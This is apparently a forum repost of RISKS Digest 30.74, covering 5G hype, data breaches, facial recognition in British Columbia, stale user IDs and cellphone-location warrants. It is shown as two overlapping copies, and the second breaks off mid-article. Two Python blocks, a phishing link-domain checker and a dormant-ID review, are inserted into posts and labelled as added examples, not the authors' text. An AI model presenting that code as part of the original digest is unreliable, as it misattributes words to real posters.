    http://www.wetmachine.com/tales-of-...-is-it-worth-what-the-carriers-are-demanding/

    It's become increasingly impossible to talk about spectrum policy without
    getting into the fight over whether 5G is a miracle technology that will end
    poverty, war and disease or an evil marketing scam by wireless carriers to
    extort concessions in exchange for magic beans. Mind you, most people never
    talk about spectrum policy at all -- so they are spared this problem in the
    first place. But with T-Mobile and Sprint now invoking 5G as a central
    reason to let them merge, it's important for people to understand precisely
    what 5G actually does. Unfortunately, when you ask most people in Policyland
    what 5G actually does and how it works, the discussion looks a lot like the
    discussion in Hitchhikers Guide To the Galaxy where Deep Thought announces
    that the answer to Life the Universe and Everything is `42'.

    So while not an engineer, I have spent the last two weeks or so doing a deep
    dive on what, exactly does 5G actually do -- with a particular emphasis on
    the recently released 3GPP standard (Release 15) that everyone is
    celebrating as the first real industry standard for 5G. My conclusion is
    that while the Emperor is not naked, that is one Hell of a skimpy thong he's
    got on.

    More precisely, the bunch of different things that people talk about when
    they say `5G': millimeter wave spectrum, network slicing, and something
    called (I am not making this up) `flexible numerology' are real. They
    represent improvements in existing wireless technology that will enhance
    overall efficiency and thus add capacity to the network (and also reduce
    latency). But, as a number of the more serious commentators (such as Dave
    Burstien over here) have pointed out, we can already do these things using
    existing LTE (plain old 4G). Given the timetable for development and
    deployment of new 5G network technology, it will be at least 5 years before
    we see more than incremental improvement in function and performance.

    Put another way, it would be like calling the adoption of a new version of
    Wi-Fi `5G Wi-Fi.' (Which I am totally going to do from now on, btw, because
    why not?)

    I elaborate more below . . .

    There are a bunch of important questions to keep in mind when evaluating
    what we ought to do about 5G as a policy question. (a) What exactly is 5G?
    (b) How does it compare to existing LTE? and, (c) How much are we being
    asked to pay for it in policy terms?

    What Exactly Do We Mean By `G'?

    `G' technically means `generation'. My favorite explanation can be found in
    this old Best Buy commercial. As a general rule, we use `G' to indicate a
    significant shift in capability, architecture and technology. For example,
    the shift from analog to digital voice in 2G, or the inclusion of limited
    data capability as an overlay to voice in 3G. The shift to 4G was marked by
    a shift to an all packet-switched data network in which voice is supported
    as one feature on the network. In addition, 4G turned out to be fairly
    homogeneous for a variety of reasons I won't get into now. Basically, after
    a brief flirtation by Sprint and a few others with WiMax, all the carriers
    ended up using LTE.

    So the switch to 5G ought to mean a major boost in both technology and
    speed. And it will, eventually. But for now, it's not so much a generational
    shift like the previous shifts but a modest transition over time. By that I
    don't mean simply that we will see 5G networks operating with 4G cores for a
    long time. That's always true. Carriers deployed LTE and still maintained
    (some to this day) 3G networks in parallel. That is necessary so that people
    and businesses can switch legacy equipment at a rational pace. What I mean
    is that the capabilities that are supposed to make 5G so awesome are not
    really that awesome right now, and won't be for at least 5 more years.

    What Makes 5G More Awesome?

    Here is where it gets confusing. You can see a good tutorial on the network
    architecture here. But this represents a relatively recent change in how we
    talk about 5G. Originally, i.e., back in 2015, we were talking about
    millimeter wave as 5G, with nothing else going on in the lower frequencies
    counting as 5G. [...]

    ------------------------------

    Date: Tue, 3 Jul 2018 20:29:22 -0400
    From: Monty Solomon <mo...@roscom.com>
    Subject: Leaks, riots, and monocles: How a $60 in-game item almost destroyed
    EVE Online (Ars Technica)

    When the developers of EVE Online added expensive in-game vanity items... it
    went poorly.

    http://arstechnica.com/gaming/2018/07/monocles/

    ------------------------------

    Date: Mon, 02 Jul 2018 11:54:05 +0800
    From: Richard M Stein <rms...@ieee.org>
    Subject: Gaming disorder is only a symptom of a much larger problem (WaPo)

    [Suitably revised, this submission might make a good April Fool's comp.risks
    contribution in 2019. And jolt a few CxOs from their Caesar salad lunch. od
    -c output attached below for peace of mind.]

    http://www.washingtonpost.com/opinions/gaming-disorder-is-only-a-symptom-of-a-much-larger-problem/2018/06/29/64f2866a-7a21-11e8-93cc-6d3beccdd7a3_story.html


    Mobile electronic devices generate addiction symptoms that mirror those
    caused by nicotine. The iGen -- young people raised on smart phones and
    social media -- are especially vulnerable to screen addiction disorder.

    Would an enterprising state attorney general attempt the equivalent of a
    ``Tobacco Master Settlement Agreement''
    (http://en.wikipedia.org/wiki/Tobacco_Master_Settlement_Agreement) against
    mobile device manufacturers, application developers, and social media for
    public health expenditures arising from treatment?

    From the MSA Wikipedia page:

    ``The general theory of these lawsuits was that the cigarettes produced by
    the tobacco industry contributed to health problems among the population,
    which in turn resulted in significant costs to the states' public health
    systems.''

    Recall that the Tobacco MSA amounted to settlement payments from tobacco
    firms for ~$US 200-375B over 25 years to reimburse states for expenses
    arising from tobacco-related illness and disease treatment. The MSA also
    imposed restrictions that prohibited tobacco advertisements toward young
    people -- a core audience for addictive products, and a business model
    impediment that penalizes income capture potential.

    Hypothetically, would substitution of ``mobile devices, apps, and social
    media'' for ``tobacco'' (the MOBASS MSA?) in an equivalent agreement be viable?
    The epidemiological evidence, per states' public health system impact to
    date, might not immediately substantiate this extrapolation. As evidence
    linking tobacco usage to illness accumulated from the 1950s through 1990s,
    so might evidence of screen addiction disorder and the effects it
    introduces.

    The spectacle of mobile device, social media, and application vendors called
    to testify under oath before Congress that ``our products are not addictive''
    would rival the perjury committed by tobacco industry executive
    predecessors. Michael Mann's ``The Insider''
    (http://www.imdb.com/title/tt0140352/?ref_=nv_sr_2) might need a sequel!

    ------------------------------

    Date: Sun, 1 Jul 2018 22:43:10 +0100
    From: Michael Kent <michae...@37.org.uk>
    Subject: Ticketmaster: How not to manage customers after a data breach.

    Like many in the UK I was contacted by Ticketmaster to let me know that my
    data might have been accessed through malicious software on the servers of a
    third party service provider. They have very kindly offered me a year's free
    identity monitoring by Experian.

    The issue? The email tells me to sign up by...

    "Visit the Data Patrol website to get started:
    http://my.garlik.com/garlik-ui/expnuk/login
    http://click.customerservice.tmm.ticketmaster.co.uk ...

    Not a Ticketmaster site, not an Experian site, just a site that screams
    ***SCAM***!!!

    A minute or two googling tells me that this is probably the legitimate
    service provider but this really isn't how to give customers confidence that
    you take security seriously!
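    One check a recipient or a mail gateway can apply to a notification like this, as an added example that is not part of Michael Kent's post: extract every link and compare its registrable domain with the sender's domain and the domains of the parties the message names; a link that matches neither cannot be vouched for by the message itself, whatever a later web search says. The sample body, sender address, named parties and the tracking-link path are constructed for the example, and the small suffix table stands in for the public suffix list a real implementation would use.

```python
"""Link-domain check for a breach notification (added example, not from the post).

The sample message body, sender address and named parties below are
constructed to mirror the Ticketmaster/Experian case; the tracking-link
path is a placeholder. TWO_LEVEL_SUFFIXES is a tiny stand-in for the
public suffix list, which a real implementation should use instead.
"""
import re
from urllib.parse import urlparse

# Suffixes under which the registrable name sits one label deeper
# (assumption: a minimal stand-in for the public suffix list).
TWO_LEVEL_SUFFIXES = {"co.uk", "org.uk", "ac.uk", "com.au"}

URL_RE = re.compile(r"https?://[^\s<>\"')]+")


def registrable_domain(host: str) -> str:
    """'my.garlik.com' -> 'garlik.com'; 'a.b.ticketmaster.co.uk' -> 'ticketmaster.co.uk'."""
    labels = host.lower().rstrip(".").split(".")
    if len(labels) >= 3 and ".".join(labels[-2:]) in TWO_LEVEL_SUFFIXES:
        return ".".join(labels[-3:])
    return ".".join(labels[-2:])


def extract_urls(body: str) -> list:
    return URL_RE.findall(body)


def classify_links(body: str, sender: str, named_parties) -> list:
    """Return (url, registrable domain, verifiable) for every link in the body.

    A link is 'verifiable' only if its registrable domain is the sender's own
    domain or the domain of a party the message names. Anything else cannot be
    vouched for by the message itself, however legitimate it may turn out to be.
    """
    trusted = {registrable_domain(sender.rsplit("@", 1)[-1])}
    trusted |= {registrable_domain(d) for d in named_parties}
    out = []
    for url in extract_urls(body):
        host = urlparse(url).hostname or ""
        dom = registrable_domain(host)
        out.append((url, dom, dom in trusted))
    return out


def unverifiable_links(body: str, sender: str, named_parties) -> list:
    """Just the links a recipient should not follow on the message's say-so."""
    return [url for url, _, ok in classify_links(body, sender, named_parties) if not ok]


# Constructed sample, modelled on the notification quoted in the post.
SENDER = "customerservice@ticketmaster.co.uk"
NAMED_PARTIES = ["ticketmaster.com", "experian.co.uk"]
BODY = """Visit the Data Patrol website to get started:
http://my.garlik.com/garlik-ui/expnuk/login
http://click.customerservice.tmm.ticketmaster.co.uk/PLACEHOLDER-TRACKING-PATH
"""

if __name__ == "__main__":
    for url, dom, ok in classify_links(BODY, SENDER, NAMED_PARTIES):
        print("ok          " if ok else "UNVERIFIABLE", dom, url)
```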

    ------------------------------

    Date: Mon, 2 Jul 2018 15:24:10 -0400
    From: Kelly Bert Manning <bo...@freenet.carleton.ca>
    Subject: Re: Police, Law Enforcement, and corporate use of facial
    recognition and facial images in court (RISKS-30.73)

    This has been used in British Columbia for a decade, has proved quite
    effective, and is pretty much settled case law in both Criminal and Civil
    cases.

    In BC Driver Licencing and BC Service Card issuing for the BC Medical
    Services Plan have been offloaded out of core government to a Crown
    Corporation, the Insurance Corporation of BC. Photo ID Service Cards for MSP
    are a relatively new development. The Original BC ``Care Cards'' did not have
    photos and involved little or no verification of the identity of who they
    were issued to. BC Residents have the option of combining the BC Service
    Card and BC Driver's Licence into one card, or having separate cards. Most
    Privacy Professionals I have discussed this with chose to have separate
    cards. I have overnight dialysis in a clinic 3 times a week, so I just take
    my BC Service Card and a transit pass with me.

    The BC Liquor Control Board used to issue its own Photo ID cards, decades
    ago, but those were also offloaded onto ICBC as ``BC ID Cards'' for people who
    did not have a BC Driver's Licence, such as a former premier who surrendered
    his DL after being caught driving under the influence in Hawaii.

    There have been at least two widely reported instances where Facial
    Recognition has been used to trigger investigations, or to identify
    criminals from photos.

    After the 2011 Stanley Cup Riot in Vancouver ICBC offered to scan its Facial
    Image DB, using the same recognition software that ICBC began using in 2008,
    without notice to customers, to detect attempts at Driver's Licence
    Fraud. ICBC had a vested interest in identifying the Rioters who damaged or
    destroyed automobiles insured by ICBC and later sued at least 46 people in
    Civil Actions. Facial Images flagged as possible Fraud attempts are reviewed
    by Police, not by ICBC employees. Biometric factors such as height, weight, and
    eye colour are also used in the matching, not just Facial Recognition.

    http://www.burnabynow.com/news/six-burnaby-defendants-in-icbc-stanley-cup-riot-civil-suit-1.1896960

    BC Information and Privacy Commissioner Elizabeth Denham ruled that ICBC
    could only do that with due process. Police turned to the Internet and
    crowd sourced identification of the rioters from pictures posted on the
    web. That turned out to be very effective, resulting in tips about the names
    of hundreds of rioters. Human eyes still beat facial recognition?

    http://www.macleans.ca/news/last-two-stanley-cup-rioters-sentenced-to-time-behind-bars-for-assault/

    ``Prosecutors laid 912 charges against 300 suspects, and 284 people pleaded
    guilty. Another six had the charges against them stayed, while 10 went to
    trial, resulting in nine convictions and one acquittal.''

    Elizabeth Denham is now the UK Data Commissioner responsible for
    investigating the Cambridge Analytica scandal.

    http://www.cbc.ca/news/canada/briti...facial-recognition-to-track-rioters-1.1207398

    http://www.oipc.bc.ca/investigation-reports/1245

    Executive Summary [8] ``I conclude that ICBC must immediately cease
    responding to requests from police to use the facial recognition database
    for the purposes of identifying individuals for police absent a subpoena,
    warrant or court order.''

    ICBC's undisclosed use of Facial Recognition to detect attempts at DL Fraud
    became public knowledge when RCMP arrived at a Government Office in Victoria
    to arrest a Civil Servant who had a meteoric rise under the name Richard
    Perran. That turned out to be a family affair, with his wife also working in
    the BC Public Service Under a stolen identity. He had also obtained a Public
    Service subsidized Master's Degree from the University of Victoria, and
    tried to leverage that into a PhD under the stolen name after being
    convicted, despite being ordered to stop using the stolen name as a
    condition of sentencing and probation.

    http://www.timescolonist.com/icbc-f...altering-record-to-get-government-job-1.21668
    http://bctrialofbasi-virk.blogspot.com/2009/12/police-probe-hiring-of-bc-civil-servant.html
    http://www.pressreader.com/canada/times-colonist/20120617/281479273491097

    ------------------------------

    Date: Mon, 2 Jul 2018 16:00:39 -0400
    From: Kelly Bert Manning <bo...@freenet.carleton.ca>
    Subject: Re: Florida skips gun background checks for a year after employee
    forgets login (RISKS-30.72,73)

    Did Security Administrators at the National Instant Criminal Background
    Check System (NICS) detect the fact that IDs were not being used and ask why
    the users were not using assigned IDs? If so did they pursue that with
    management in the Florida Department of Agriculture and Consumer Service?
    The report cited in RISKS says that the Florida OIG detected the issue.

    I was a top-level RACF Security Admin for the BC Ministry of Health from
    1980 until 2016, first in the BC Public Service and later as a Contracted
    Resource working for a world scale IT Services company with its HQ in
    Montreal.

    One of the auto generated routine reports that I had to review was a report
    of IDs that had expired passwords because the User had not changed the
    password for more than 60 days.

    Last-Use Date was also tracked.

    Part of my job was repeatedly nagging user supervisors about whether the
    person the ID was issued to was still working in a position that required
    access, based on the expired password and the last use date.

    Repeating the query at regular intervals was part of my job even though it
    tended to make me seem like a broken record.

    Responding to requests for new user IDs was something I used to revisit the
    matter. That is, why did the area need a new user ID when it had been issued
    positional IDs that had not been used in years, or even decades.

    Positional IDs are associated with a specific job function.

    If a user leaves, or changes job roles they get a new ID associated with the
    new role. The old ID should be reassigned, deactivated, or deleted as part of
    that transition.
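    The review the post describes, as an added example in Python (not the poster's code and not any real RACF report): flag active IDs whose password has gone more than 60 days unchanged, IDs that are dormant or never used by last-use date, and the unused positional IDs a new-ID request should be checked against; a role change deactivates the old positional ID and issues a fresh one. The record layout, the `MOH...` userids and the 365-day dormancy window are assumptions, and all records are constructed.

```python
"""Stale positional-ID review, in the spirit of the routine RACF reports
described above (added example; not the poster's code or any real system).

Rules: a password unchanged for more than 60 days is expired (the post's
figure); an ID unused for more than DORMANT_DAYS, or never used, is dormant
(the 365-day window is an assumption). All records below are constructed.
"""
from dataclasses import dataclass, replace
from datetime import date
from typing import Dict, List, Optional

PASSWORD_MAX_AGE_DAYS = 60   # from the post
DORMANT_DAYS = 365           # assumption for this example


@dataclass(frozen=True)
class PositionalId:
    userid: str
    position: str               # job function the ID is tied to
    pwd_changed: date           # date of the last password change
    last_used: Optional[date]   # None: the ID has never logged on
    active: bool = True


def password_expired(rec: PositionalId, today: date) -> bool:
    return (today - rec.pwd_changed).days > PASSWORD_MAX_AGE_DAYS


def dormant(rec: PositionalId, today: date) -> bool:
    """Never used, or not used within DORMANT_DAYS."""
    return rec.last_used is None or (today - rec.last_used).days > DORMANT_DAYS


def review(ids: List[PositionalId], today: date) -> Dict[str, List[str]]:
    """The routine report: each active ID listed under every condition that a
    supervisor should be asked to justify."""
    report: Dict[str, List[str]] = {"expired_password": [], "dormant": [], "never_used": []}
    for rec in ids:
        if not rec.active:
            continue
        if password_expired(rec, today):
            report["expired_password"].append(rec.userid)
        if rec.last_used is None:
            report["never_used"].append(rec.userid)
        elif dormant(rec, today):
            report["dormant"].append(rec.userid)
    return report


def unused_ids_for_position(ids: List[PositionalId], position: str, today: date) -> List[str]:
    """Answer to a new-ID request: which active IDs already issued to this
    position is nobody using?"""
    return [r.userid for r in ids
            if r.active and r.position == position and dormant(r, today)]


def transfer(ids: List[PositionalId], userid: str, new_userid: str,
             new_position: str, today: date) -> List[PositionalId]:
    """Role change: deactivate the old positional ID and issue a fresh one tied
    to the new role, so the old access does not travel with the person."""
    out: List[PositionalId] = []
    for r in ids:
        if r.userid == userid:
            out.append(replace(r, active=False))
            out.append(PositionalId(new_userid, new_position, today, None))
        else:
            out.append(r)
    return out


# Constructed sample records (hypothetical 'MOH' userids).
TODAY = date(2018, 7, 2)
SAMPLE = [
    PositionalId("MOH0101", "claims-clerk", date(2018, 6, 20), date(2018, 7, 1)),
    PositionalId("MOH0102", "claims-clerk", date(2018, 3, 1), date(2018, 3, 15)),
    PositionalId("MOH0103", "claims-clerk", date(2016, 1, 4), date(2016, 2, 9)),
    PositionalId("MOH0104", "registrar", date(2018, 5, 30), None),
    PositionalId("MOH0105", "registrar", date(2010, 1, 1), date(2010, 1, 1), active=False),
]

if __name__ == "__main__":
    for condition, userids in review(SAMPLE, TODAY).items():
        print(f"{condition:17s} {userids}")
    print("claims-clerk IDs to reconsider before issuing a new one:",
          unused_ids_for_position(SAMPLE, "claims-clerk", TODAY))
```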

    ------------------------------

    Date: Tue, 5 May 2018 11:11:11 -0800
    From: RISKS-...@csl.sri.com
    Subject: Abridged info on RISKS (comp.risks)

    The ACM RISKS Forum is a MODERATED digest. Its Usenet manifestation is
    comp.risks, the feed for which is donated by panix.com as of June 2011.
    => SUBSCRIPTIONS: The mailman Web interface can be used directly to
    subscribe and unsubscribe:
    http://mls.csl.sri.com/mailman/listinfo/risks

    => SUBMISSIONS: to ri...@CSL.sri.com with meaningful SUBJECT: line that
    includes the string `notsp'. Otherwise your message may not be read.
    *** This attention-string has never changed, but might if spammers use it.
    => SPAM challenge-responses will not be honored. Instead, use an alternative
    address from which you never send mail where the address becomes public!
    => The complete INFO file (submissions, default disclaimers, archive sites,
    copyright policy, etc.) is online.
    <http://www.CSL.sri.com/risksinfo.html>
    *** Contributors are assumed to have read the full info file for guidelines!

    => OFFICIAL ARCHIVES: http://www.risks.org takes you to Lindsay Marshall's
    searchable html archive at newcastle:
    http://catless.ncl.ac.uk/Risks/VL.IS --> VoLume, ISsue.
    Also, ftp://ftp.sri.com/risks for the current volume
    or ftp://ftp.sri.com/VL/risks-VL.IS for previous VoLume
    If none of those work for you, the most recent issue is always at
    http://www.csl.sri.com/users/risko/risks.txt, and index at /risks-30.00
    Lindsay has also added to the Newcastle catless site a palmtop version
    of the most recent RISKS issue and a WAP version that works for many but
    not all telephones: http://catless.ncl.ac.uk/w/r
    ALTERNATIVE ARCHIVES: http://seclists.org/risks/ (only since mid-2001)
    <http://the.wiretapped.net/security/info/textfiles/risks-digest/>
    *** NOTE: If a cited URL fails, we do not try to update them. Try
    browsing on the keywords in the subject line or cited article leads.
    Apologies for what Office365 and SafeLinks have done to URLs. I have
    tried to extract the essence.
    ==> Special Offer to Join ACM for readers of the ACM RISKS Forum:
    <http://www.acm.org/joinacm1>

    ------------------------------

    End of RISKS-FORUM Digest 30.74
    ************************
     
  9. LakeGator

    Risks Digest 30.74

    RISKS List Owner

    Jul 5, 2018 3:12 PM

    Posted in group: comp.risks

    RISKS-LIST: Risks-Forum Digest Thursday 5 July 2018 Volume 30 : Issue 74

    ACM FORUM ON RISKS TO THE PUBLIC IN COMPUTERS AND RELATED SYSTEMS (comp.risks)
    Peter G. Neumann, moderator, chmn ACM Committee on Computers and Public Policy

    ***** See last item for further information, disclaimers, caveats, etc. *****
    This issue is archived at <The Risks Digest> as
    <The Risks Digest>
    The current issue can also be found at
    <http://www.csl.sri.com/users/risko/risks.txt>

    Contents:
    Cyber-researchers Don't Think Feds or Congress Can Protect Against
    Cyberattacks (Defense One)
    Babylon claims its chatbot beats GPs at medical exam (bbc.com)
    Medical device security: Hacking prevention measures (HPE)
    Exactis said to expose 340-million records, more than Equifax breach (CNET)
    Supreme Court requires warrant for cellphone location data (Henry Baker)
    ICE hacked its algorithmic risk-assessment tool, so it recommended
    detention for everyone (BoingBoing)
    Energy company vulnerability allows access to customer accounts
    (Donald Mackie)
    Internet TV firmware update/soft powerswitch failure (Richard M Stein)
    Widespread Google Home outage: What NOT to do! (Lauren Weinstein)
    Cruel pranksters made NYC Internet kiosks play ice-cream truck tunes
    (Engadget)
    Swann home security camera sends video to wrong user (BBC)
    Hidden Microsoft Office 365 data gathering (LMG Security)
    Protecting civilians in cyberspace (Just Security)
    Rash of Fortnite cheaters infected by malware that breaks HTTPS
    encryption (Ars Technica)
    Really dumb malware targets cryptocurrency fans using Macs (Ars Technica)
    Sony Blunders By Uploading Full Movie to YouTube Instead of Trailer
    (TorrentFreak)
    Homeland Security subpoenas Twitter for data breach finder's account
    (Zack Whittaker)
    Wikipedia Italy Blocks All Articles in Protest of EU's Ruinous
    Copyright Proposals (Gizmodo)
    How a Major Computer Crash Showed the Vulnerabilities of EHRs (Medscape
    via Fr. Stevan Bauman)
    Apple 'Family Sharing' feature used by scammers to make purchases
    with hacked Apple IDs (Business Insider)
    ``Trump administration tells FCC to block China Mobile from U.S.''
    (Corinne Reichert)
    Google is training machines to predict when a patient will die
    (Los Angeles Times)
    So What The Heck Does 5G Actually Do? And Is It Worth What The Carriers
    Are Demanding? (Harold Fel)
    Leaks, riots, and monocles: How a $60 in-game item almost destroyed
    EVE Online (Ars Technica)
    Gaming disorder is only a symptom of a much larger problem (WaPo)
    Ticketmaster: How not to manage customers after a data breach.
    (Michael Kent)
    Re: Police, Law Enforcement, and corporate use of facial recognition
    and facial images in court (Kelly Bert Manning)
    Re: Florida skips gun background checks for a year after employee
    (Kelly Bert Manning)
    Abridged info on RISKS (comp.risks)

    ----------------------------------------------------------------------

    Date: Wed, 27 Jun 2018 20:52:12 PDT
    From: Peter G Neumann <neu...@csl.sri.com>
    Subject: Cyber-researchers Don't Think Feds or Congress Can Protect Against
    Cyberattacks (Defense One)

    Cyber Researchers Don't Think Feds or Congress Can Protect Against Cyberattacks

    Quite evidently, the U.S. government has little clue about defending itself
    against cybersecurity attacks, and is consequently unprepared for any
    digital disasters.

    ------------------------------

    Date: Sat, 30 Jun 2018 10:28:47 +0800
    From: Richard M Stein <rms...@ieee.org>
    Subject: Babylon claims its chatbot beats GPs at medical exam (bbc.com)

    [od -c output attached for peace of mind]

    Chatbot claims to beat GPs at medical exam

    ``Claims that a chatbot can diagnose medical conditions as accurately as a
    GP have sparked a row between the software's creators and UK doctors.''

    Babylon's chatbot claims to out-achieve carbon-based physicians on the
    UK MRCGP (Membership Royal College of General Practitioners)
    examination. Babylon advocates their AI platform to complement a
    physician's judgment, not as a wholesale replacement.

    ``Babylon said that the first time its AI sat the exam, it achieved a
    score of 81%. It added that the average mark for human doctors was 72%,
    based on results logged between 2012 and 2017. But the RCGP said it had
    not provided Babylon with the test's questions and had no way to verify
    the claim.''

    Given commercial aspirations, and the skyward trajectory of health care
    service delivery, an attempt to capitalize on a ``cost-effective'' AI-based
    alternative is likely. Favorable legislation, and weak regulatory oversight,
    will induce businesses to pursue them despite potential public health risks.

    A randomized control trial must be performed. Any business that promotes and
    sells these AI diagnosis/treatment services must be required to enroll their
    own employees and immediate family members as participants. The trial
    outcome reviewers must be free from conflict of interest.

    ------------------------------

    Date: Mon, 2 Jul 2018 15:37:04 -0400
    From: Gabe Goldberg <ga...@gabegold.com>
    Subject: Medical device security: Hacking prevention measures (HPE)

    With so many lives at stake, computer scientists and healthcare IT pros are
    motivated to develop strategies that keep patients safe from medical device
    hackers. They're making progress.

    Medical device security: Hacking prevention measures

    ------------------------------

    Date: Wed, 27 Jun 2018 18:50:14 -0400
    From: Richard Forno <rfo...@infowarrior.org>
    Subject: Exactis said to expose 340-million records, more than Equifax breach
    (CNET)

    Exactis said to have exposed 340 million records in massive leak

    We hadn't heard of the firm either, but it had data on hundreds of millions
    of Americans and businesses and leaked it, according to Wired.

    Abrar Al-Heeti
    June 27, 2018 2:14 PM PDT

    If you're a US citizen, your personal information -- your phone number, home
    address, email address, even how many children you have -- may have just
    become easily available to hackers in an alleged massive data leak.

    Florida-based marketing and data aggregation firm Exactis exposed a database
    containing nearly 340 million individual records on a publicly accessible
    server, Wired reported. Earlier this month, security researcher Vinny Troia
    found that nearly 2 terabytes of data was exposed, which seems to include
    personal information on hundreds of millions of US adults and millions of
    businesses, the report said.

    ``It seems like this is a database with pretty much every US citizen in it,''
    Troia told Wired.

    Exactis didn't immediately respond to a request for comment or confirmation.

    The alleged breach reportedly exposed highly personal information, such as
    people's phone numbers, home and email addresses, interests and the number,
    age and gender of their children. Credit card information and Social
    Security numbers don't appear to have been leaked. Troia told Wired that he
    doesn't know where the data is coming from, ``but it's one of the most
    comprehensive collections I've ever seen.''

    Because Exactis hasn't confirmed the leak, it's hard to know exactly how
    many people are affected. But Troia found two versions of the database that
    each had around 340 million records, with roughly 230 million on consumers
    and 110 million on business contacts, according to Wired. Exactis says on
    its website that it has over 3.5 billion consumer, business and digital
    records.

    The data leak is noteworthy not only for its breadth, but also for the depth
    of information the records have on people. Every record reportedly has
    entries that include more than 400 variables on characteristics like whether
    the person smokes, what their religion is and whether they have dogs or
    cats. But Wired noted that in some instances, the information is inaccurate
    or outdated.

    Just because people's financial information or Social Security numbers
    weren't leaked doesn't mean they're not at risk for identity theft. The
    amount of personal information that was exposed could still help scammers
    impersonate or profile them.

    Huge compromises to personal information have been making headlines
    lately. In 2017, Equifax was involved in a massive data breach of 145.5
    million people's data. And in October, Yahoo revealed that all 3 billion
    accounts were hacked in a 2013 breach.

    ------------------------------

    Date: Mon, 25 Jun 2018 07:09:23 -0700
    From: Henry Baker <hba...@pipeline.com>
    Subject: Supreme Court requires warrant for cellphone location data

    Nice to see that the ``Third Party Doctrine'' -- which gave the govt ``most
    favored nation status'' w.r.t. your data -- is finally being chipped away.

    However, as this law professor points out, this decision will have little
    practical effect.

    [Sorry for the length of this posting, but every point is salient.]

    The latest Supreme Court decision is being hailed as a big victory for
    digital privacy. It's not.

    Carpenter forces police to get a warrant before getting some cellphone
    data. But other Fourth Amendment cases will undermine its impact.

    By Aziz Huq Updated Jun 23, 2018, 7:43am EDT

    Congratulations -- a closely divided US Supreme Court has just ruled in
    Carpenter v. United States that you have a constitutional right to privacy
    in the locational records produced by your cellphone use. Law enforcement
    now cannot ask Sprint, AT&T, or Verizon, for cell tower records that reveal
    your whereabouts through your phone's interaction with those towers, at
    least without a warrant.

    Carpenter builds on two earlier decisions. In 2011, the Court required a
    warrant before police placed a GPS tracker on a vehicle to track its
    movements. In 2014, it forbade warrantless searches of cellphones during
    arrests. Whatever its other flaws, the Roberts Court thus seems to
    understand electronic privacy's importance.

    But there are a couple of things to know before toasting the Court's high
    regard for privacy in the digital age. The Roberts Court, building on what
    the preceding Rehnquist Court did, has created an infrastructure for Fourth
    Amendment law that makes it exceptionally easy for police to do a search,
    even when a warrant is required. The law also makes it exceptionally
    difficult for citizens to obtain close judicial oversight, even when the
    police have violated the Constitution. As a result of these background
    rules, even a decision as seemingly important as Carpenter is unlikely to
    have any dramatic effect on police practices.

    It's not just that our digital privacy is insufficiently protected, in other
    words. It's that our Fourth Amendment rights and remedies in general have
    been eroded. Once enough holes have been poked in the general system for
    vindicating Fourth Amendment interests, the decision to extend Fourth
    Amendment coverage to a new domain -- such as cell-site locational data --
    is just not terribly significant.

    Timothy Ivory Carpenter had been convicted of nine armed robberies based on
    witness testimony, but the prosecution also stressed in its closing argument
    records obtained from his cellphone company. Those records showed how
    Carpenter's phone interacted with the cell phone towers that carried its
    signal. As Chief Justice Roberts emphasized, the records painted a detailed
    picture of Carpenter's movements over 127 days.

    Yet the government did not use a warrant based on probable cause to obtain
    those cell-site records, relying instead on a statute called the Stored
    Communications Act.

    Forcing police to get a warrant is not much of a protection these days

    Consider first the core constitutional protection on which Chief Justice
    Roberts's opinion in Carpenter hinged -- the requirement of a warrant based
    on probable cause from a judge before the police can acquire cell-site
    records that allow for detailed physical tracking of suspects' movements.

    From now on, the police will usually have to get a warrant before seeking
    such information. But that offers limited protection. One reason: In other
    Fourth Amendment cases, the Court has held that it is not just life-tenured
    federal judges who can issue warrants. A warrant can also be obtained from
    a range of other officials, including municipal court clerks who have no law
    training and no tenure protection. Such clerical staff lack the skills and
    incentives to examine warrant applications closely to determine compliance
    with the law. Still, they are allowed to issue warrants.

    Even where there are no such court clerks, it is well known that police and
    prosecutors go ``judge shopping'' when a physical search or arrest is in
    play. Judges have varying reputations for being more or less careful in
    scrutinizing warrant applications. It is often well known which judges in a
    city or courthouse are more or less scrupulous. When police have a weak
    warrant application, they have a strong incentive to avoid judges who will
    give it a close read.

    These weaknesses in the warrant regime for physical searches or arrests are
    exacerbated when electronic data is at issue. Warrant applications for cell
    tower records often rest on technical details about the geographic and
    temporal scope of the search. These applications might in theory seek a
    quite varied range of information, including the target's location, the
    number of calls he made, and the manner in which he used apps.

    Review of the application will also require fine judgments about when
    information can be shared with other law enforcement agencies and government
    officials. Just because a prosecutor can obtain electronic data, for
    example, that surely doesn't mean she can hand it over to, say, a political
    appointee in the White House or a Department of Transportation employee who
    happens to be the subject's boyfriend.

    Because close scrutiny by an experienced and independent judge has become so
    easy to avoid, there is no guarantee these questions will get
    careful and independent consideration -- even if a warrant is sought and
    issued consistent with the main holding of Carpenter.

    The hurdle of ``probable cause'' has also been steadily lowered

    Assume that police are before a scrupulous judge. Even then, the background
    Fourth Amendment rules mean that they have a light burden to bear. As Chief
    Justice Roberts's opinion today stresses, a warrant can be issued only based
    on ``probable cause.'' But in a series of earlier cases about physical
    searches, the Court has winnowed down the ``probable cause'' requirement to
    the showing of a mere ``fair probability'' that evidence of a crime will be
    found.

    This ``fair probability'' requirement has become easier to satisfy in recent
    decades because federal and state legislatures have created sweeping
    penalties for conspiracies to commit crimes and for accomplices.

    Showing a ``fair probability'' of a conspiracy to commit a crime is not
    difficult. Under federal law, for example, a criminal conspiracy
    exists if there's an agreement to commit any criminal act in the
    future, and one step -- even a lawful one -- taken to that end. In
    one case, for example, a Google search served as the ``overt act'' for
    an elaborate conspiracy charge, even in the absence of evidence of
    actual planned criminal conduct.

    This sweeping definition of criminal liability interacts with the weak
    ``probable cause'' rule. Police need only show a ``fair probability''
    that a single lawful action has been taken in relation to a criminal
    agreement, and they are entitled to a warrant. This is not hard to
    do.

    This problem is pervasive across Fourth Amendment law. But it has
    particular significance to cell-site locational data. Such data maps
    the movements of a group of people -- precisely the evidence that is
    routinely relevant to conspiracy charges. So with a conspiracy theory
    in hand, it will often be very easy for the police to meet the
    (exceedingly weak) probable cause standard.

    Would a warrant requirement have made a practical difference in
    Carpenter's case?

    In Carpenter's case, investigators had a confession from one of the
    participants in the string of armed robberies. They also had the cell
    numbers of other participants, including Carpenter's. These two
    pieces of information would almost certainly have been enough to allow
    the government to get a warrant on a conspiracy theory of probable
    cause.

    But imagine that the investigator couldn't even pull together evidence
    showing probable cause of a conspiracy. Imagine that they instead
    play fast and loose with the contents of the warrant application. For
    example, the application might rest on some dubious evidence, and the
    investigator might consciously choose not to confirm its accuracy.
    Once charges have been filed, could a defendant get the locational
    data thrown out on the grounds that the warrant application was based
    on false pretenses?

